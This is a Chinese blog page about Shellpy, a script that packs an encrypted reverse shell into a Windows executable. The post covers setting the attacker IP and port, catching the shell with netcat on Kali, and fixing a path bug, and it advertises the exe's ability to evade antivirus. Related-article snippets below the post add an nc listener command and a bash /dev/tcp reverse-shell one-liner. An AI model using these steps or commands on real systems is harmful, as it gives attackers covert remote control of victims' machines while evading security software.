windows 反弹shell_使用shellpy建立反向Shell

最新推荐文章于 2024-04-23 21:45:00 发布
最新推荐文章于 2024-04-23 21:45:00 发布
阅读量121 收藏
点赞数
文章标签: windows 反弹shell

80c954be9b3a660388fe53e239053a62.png

Shellpy

地址:https://github.com/DarkSecDevelopers/Shellpy Shellpy是一个小脚本工具,可以在windows下建议一个反向的shell。

使用说明:下载工具后,打开run.py,修改其中的IP地址和端口,IP为接收shell机器的IP,端口自定义。

5bda55ec0c46b46a8b1cd16a203c2591.png

修改成自己的后,我们就可以运行这个脚本,根据后面代码可以看到,脚本首先会将反弹shell的代码进行加密,加密后写到shell.py文件中,随后再把shell.py生成exe,最后运行这个exe就可以了。

b6f916d826ee361dec815ce35f9962f5.png

exe文件生成后,直接运行即可,这里反射的shell地址是kali的,kali使用nc进行监听:

e268922ffd5fabded6a99949ada3c9d5.png

免杀效果

这种生成的exe具有比较好的免杀效果,本机只装了火绒,所以简单的扫了下。

2638d89eced1599206c1de05251d233f.png

使用问题

脚本生成exe后我这里报了一个错,说系统找不到指定文件。

c5bbc50c5ae7fd60b980eb177f3d51cf.png

原因可能是打开cmd.exe的路径有问题,在代码中打开cmd路径是`\\windows\system32\\cmd.exe`,其中system32前面应该是少了一个斜杠的,使用的时候可以加一下,建议在路径前把c:也加上。

weixin_39946500
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一句话反射shell
tudoutest的博客
12-28 872
通过一句话反射一个shell   首先你在自己的及其上起一个进程来监听 mypc$ nc -l -v 0.0.0.0 4444   ip就是你自己的ip 端口任意(我这里写的是4444) 注意这个端口不要被自己的防火墙过滤掉 比如ubuntu上可以用 ufw allow 端口号 来打开端口。   后面就是到要反射的及其上输入命令   Bash bash -i >&...
Shell_NotifyIcon_practice.rar
10-19
总的来说,掌握`Shell_NotifyIcon()`的使用对于任何需要在Windows系统托盘区域展示状态或者提供快捷菜单的程序设计者来说都是至关重要的。通过实践和理解这个示例,你可以深入理解系统托盘图标的工作原理,并将其...
内网渗透之Windows反弹shell(二)
不知名白帽的博客
07-18 2655
内网渗透之Windows反弹shell(二)(03Rundll32.exe、04Regsvr32.exe、05Certutil.exe)
网络安全-反弹shell详解(攻击,检测与防御)
最新发布
2401_84466336的博客
04-23 2985
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
shell反射
weixin_30237719的博客
03-08 701
一、介绍 bash反射就是反弹一个交互的shell,类似ssh连接,可以执行命令 二、使用命令 bash-i>&/dev/tcp/10.0.0.1/80800>&1 bash -i 是打开一个交互的bash >& 是将标准错误输出定向到标准输出中。 /dev/tcp/ 是Linux中的一个特殊设备,打开这个文...
Java bindshell/reverseshell pakage
blogfeifei
12-22 140
import java.net.Socket;import java.net.ServerSocket;import java.io.*;import java.util.*;public class back{ static class conn extends Thread{ InputStream is;OutputStream os;public conn(InputStream i...
Power Shell的反射
ilovewqf的博客
06-08 918
我总是拿Java的思维去理解powershell,power shell的get-member,按我的思维模式来说,就是反射。比如对1进行反射PS C:\work> 1|get-Member TypeName:System.Int32Name MemberType Definition ---- ---------- ---------- CompareTo M
04 B-rand.rar_Windows编程_Shell__Windows编程_Shell_
08-09
"Windows编程_Shell_"这部分标签表明内容着重于使用Windows操作系统内置的命令行工具,如命令解释器(CMD)或PowerShell,进行程序设计,特别是通过Shell脚本来实现功能。 在Windows编程中,Shell指的是命令行环境...
ShellExtGuide2_demo.zip_DEMO_shell_shell编程_windows shell
09-23
本示例集("ShellExtGuide2_demo.zip_DEMO_shell_shell编程_windows shell")提供了关于如何在Windows环境下进行Shell编程的实例。 首先,我们关注的是"shell编程",这是指在操作系统外壳环境中编写脚本,通常用于...
cmdSh3G62fFG_windows_if_shell_源码
10-04
Windows shell comamns explicit charge for using this font if you are an individual or an educational institution
ftp.rar_FTP SHELL_linux 远程shell_shell
09-24
在这个“ftp.rar_FTP SHELL_linux 远程shell_shell”的压缩包中,我们主要关注的是如何使用FTP在Linux环境中创建一个远程shell,以便进行系统管理或者文件操作。 FTP Shell,即通过FTP协议实现的命令行交互式环境,...
Python和Shell交互工具ShellPy.zip
07-18
ShellPy 是一款Python和Shell的交互工具。一般来说,我们会通过Subprocess、Popen或者Command模块执行一条Shell命令或脚本,然后通过返回的标准输出和错误输出来得到结果,这个可行但不直观。ShellPy直观的解决了这一问题。shellpy的主体是Python,总体的编码和Python是一样的,想要嵌入Shell命令的时候,在命令前面加一个 ` (Tab上面那个键,一个右点号)。例如`ls -l`或者`ls -l也支持多行命令echo test > test.txt cat test.txt长命令`echo This is \   a very long \   line也可以把返回结果赋值给一个变量result = `ls -l输出一个命令的返回码result = `ls -l print result.returncode获取标准输入输出文本result = `ls -l result_text = result.stdout result_error = result.stderr逐行遍历文本result = `ls -l for line in result:     print line.upper() 标签:ShellPy
java 反射执行shell_Java使用反射来获取泛型信息
weixin_32894769的博客
02-24 105
Java通过指定类对应的Class对象,程序可以获得该类里包括的所有Field,不管该Field使用private修饰,还是使用public修饰。获得了Field对象后,就可以很容易的获得该Field的数据类型,例如,下面的代码便是获得该Field对象foeld的类型:Class> type = field.getType();但是通过这种方式只对普通类型的Field有效,如果该Field的...
java 反射执行shell_Java执行Shell脚本
weixin_42510600的博客
02-24 123
Linux 系统下采用 Java 执行 Shell 脚本,直接上代码:package com.smbea.demo;import java.io.BufferedReader;import java.io.IOException;import java.io.InputStreamReader;/*** 执行 Shell 脚本* @author hapday* @date 2017年3月14日 @...
反射Shell > 后门程序 > 挖矿程序 --处理篇之一
一杯咖啡的渗透记忆
04-10 925
时间:2019-4-9 14:00 接到运维的工单 现象:服务器安全报警如下图 问题追踪: 1. 怕影响到其他机器,所以第一步将该服务器隔离。 注:至于怎么隔离?一般基础云服务商都会提供,前提你已经用了他们的基础安全产品。如果没有的话,只能断网。 2. 远程连接这台机器: a. 进程查看 top命令显示如下: b. 查看反弹shell的路径下的文件: ...
java 反射执行shell,Java调用运行shell脚本
weixin_33838871的博客
03-14 129
做一下记录 ` private static Logger logger = Logger.getLogger(JavaRunShellService.class); //基本路径 private static final String basePath = "/usr/local/java-run/logs/"; //记录Shell执行状况的日志文件的位置(绝对路径) private stati...
反射Shell > 后门程序 > 挖矿程序 --处理篇之二
一杯咖啡的渗透记忆
04-10 612
反射Shell > 后门程序 > 挖矿程序 --处理篇之一 前篇会对问题做一些说明,已经有了问题追踪阐述: 补充一个点: 查看发现/etc/ld.so.preload对应的实际路径为:上面splunk根目录下lib目录里面的一个文件: 处理方案: 1. 将上面的文件备份如上,同时杀掉之前splunk.pid里面的所有进程。 这边强调一下是同时,命令如下:ki...
《快学 Go 语言》第 14 课 —— 反射
codehole_的博客
12-24 187
反射是 Go 语言学习的一个难点,但也是非常重要的一个知识点。反射是洞悉 Go 语言类型系统设计的法宝,Go 语言的 ORM 库离不开它,Go 语言的 json 序列化库...
python 写的一个反向连接的shell
斑竹的程序设计专栏
07-27 1384
    sock.close()    sys.exit(0)  if data[:-1]==pwd:     sock.send(os.getcwd()+/n)  fo最近在复习python,顺便写了一个简单的反向shell。。纯粹是为了练笔。。因为python大部分都存在于linux/unix中,在windows中很少有安装python(尤其是服务器,除非web是python写的)。但
windows反弹shell方法
09-21
Windows反弹shell有多种方法,其中包括Powercat反弹shell、Nishang反弹shell使用邮件地址作为反弹shell的服务器地址。 Powercat反弹shell是一种通过PowerShell实现的方法。攻击者可以在目标机器的cmd中执行命令,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值